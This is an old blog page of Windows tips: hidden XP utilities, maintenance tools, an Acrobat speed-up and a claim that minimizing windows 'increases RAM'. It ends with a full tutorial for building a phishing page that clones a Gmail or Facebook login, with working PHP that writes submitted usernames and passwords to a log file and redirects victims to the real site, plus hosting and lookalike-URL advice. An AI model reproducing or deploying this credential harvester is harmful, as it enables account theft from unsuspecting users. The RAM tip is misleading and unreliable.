Text

"Please Give Your Donation With Click My Ads or be my referral in trekpay/ziddu"

Jan 25, 2011

Hidden Programs In Windows XP !

Hidden Programs in windows Xp. Type the following commands in RUN.

Programs :

1. Private Character Editor :
Used for editing fonts,etc.
** start>>Run
** Now, type eudcedit

2. Dr. Watson :
This an inbuilt windows repairing software !
** start>>Run
** Now, type drwtsn32

3. Media Player 5.1 :
Even if you upgrade your Media Player, you can still access your old player in case the new one fails !!!
** start>>Run
** Now, type mplay32

4. iExpress :
Used to create SetupsYou can create your own installers !
** start>>Run
** Now, type iexpress
Read More...

Maintain your System Healthy and Error Free

Maintaining your computer is the key to keeping it healthy and fully working and of course, fast. Windows 95 has most of the tools for maintaining your PC, but Windows 98 extends the possibilities and makes it even less of a hassle. If you follow the list below and run the programs listed frequently, you will be guaranteed to have a maintained computer at no extra cost. There are, however, other programs in the market with stronger engines, but then again, they're not free (stop smiling...)

Most of these programs can be found under the Start, Programs, Accessories, System Tools folder.

1. Disk Defrag: It is advisable to run Defrag under Windows 95 once a month or when you add/remove programs. However, under Windows 98, you can run it every week if you want because it has a new engine, which means that the more you run it, the faster your computer will get. What happens is that your programs are placed on your hard disk in a way so that the ones you use most often are easier for the hard disk to find and run. Make sure that the 'make my programs run faster' is ticked in the 'Settings' window in Defrag.

2. Scandisk: Running a thorough check is good once a month in both Windows 95 and 98. Run this once a month if you feel that your hard disk takes a long time to load programs. A standard check is very fast and checks for basic disk problems concerning files and folders and lost fragments. It takes an average 2 minutes to complete so try running it often.

3. Disk cleanup: This one is good for seeing how much disk space is being used up by unnecessary files that are in the recycle bin, temp folder, or in temporary internet folders. You can then remove them!

4. RegClean: A simple but effective piece of software this is. You can download it for free from Microsoft's web site. It is also available on many magazine cover disks. Reg Clean takes about a minute to check the registry. Then it asks whether you want to clean out redundant or orphan file. This usually helps the computer to get rid of files that have been left behind by uninstalled programs.

5. Windows update: It's a good idea to use Windows Update to make sure your computer has all the latest fixes, patches and updates. You can do so by clicking on its icon in the Start Menu under Windows 98.

6. Tweak ALL: A very handy program that allows to change settings, which cannot be changed using Windows alone!
Read More...

Increase your RAM and So System Speed

1). Start any application, say Word. Open some large documents.

2). Press CTRL+SHIFT+ESC to open Windows Task Manager and click Processes tab and sort the list in descending order on Mem Usage. You will notice that WINWORD.EXE will be somewhere at the top, using multiple MBs of memory.

3). Now switch to Word and simply minimize it. (Don't use the Minimize All Windows option of the task bar).

4). Now go back to the Windows Task Manager and see where WINWORD.EXE is listed. Most probably you will not find it at the top. You will typically have to scroll to the bottom of the list to find Word. Now check out the amount of RAM it is using. Surprised? The memory utilization has reduced by a huge amount.

5). Minimize each application that you are currently not working on by clicking on the Minimize button & you can increase the amount of available RAM by a substantial margin. Depending upon the number and type of applications you use together, the difference can be as much as 50 percent of extra RAM.

In any multitasking system, minimizing an application means that it won't be utilized by the user right now. Therefore, the OS automatically makes the application use virtual memory & keeps bare minimum amounts of the code in physical RAM.
Read More...

SPEED UP ACROBAT READER (ALMOST LIKE NOTEPAD)

Adobe Acrobat reader always consumes more memory when it starts. The reason behind is, it loads all the plugins, even the plugins that you do not use. This trick is to remove all the plugins from the plugins directory to elsewhere. Hence, whenever you open Acrobat reader it directly opens the files without loading any plugins and the speed is just like Notepad.


1. Go to the installation folder of acrobat reader
(C:\program files\adobe\acrobat\reader\.. whatever)

2. Move all the files and folders from the "plugins" directory to the "Optional" directory. (I repeat.. cut and paste the files NOT copy & paste).

Also make sure that acrobat reader is not open else it will lock the files and not allow you to move the files).

Now your acrobat reader will load very fast and almost as good as notepad. 


Good Luck Read More...

Creating a fake ( phishing ) page of gmail , facebook , orkut , myspace etc.

Phishing has become a very easy to use trick to hack usernames and passwords of users. Here demonstrate how to create a fake phishing page for almost any social networking site , email or any other site that has a login form.

For this trick you would need a hosting account , you can get that easily.
Register yourself at t35, host1free, 110mb etc.
Note- 110mb checks for phishing page on their site and removes them.



So now u have a hosting account so lets create a fake page-

First go to the target site. In your browser select Save As from the File menu and save the site on
 your hardisk with name "login.htm" .

or alternatively right click on the page and click "view source" and copy all of it and save them to a notepad file. Rename the file with "login.htm".

Now the second part of the hack-
Go to Notepad and copy this into it-


<?php

header ('Location: http://www.facebook.com');

$handle = fopen("log.txt", "a");

foreach($_POST as $variable => $value) {

   fwrite($handle, $variable);

   fwrite($handle, "=");

   fwrite($handle, $value);

   fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

?>


replace facebook.com with the URL you want the user to go after he clicks on submit button.

Save the page as fish.php

Now you need to edit the "login.htm" file we saves earlier. So go to that and open it with notepad.
now search for anyhtin like "action=" which has something with login. And replace the URl with "fish.php".

Also create a blank txt file with name "log.txt" . This file would be used to save your logins and passwords.
Now you are done,.

Go to your hosting account and upload all the files to your server.
Now go to the URL provided by ur host.

Like - http://g00glepage.t35.com/login.htm

And you would see the fake page as it is.
Now enter the username and password.

Check the log.txt file. The password and username you enterd previously would be saved in the log.txt  file.

Here you have a working phishing page.
Read More...

Followers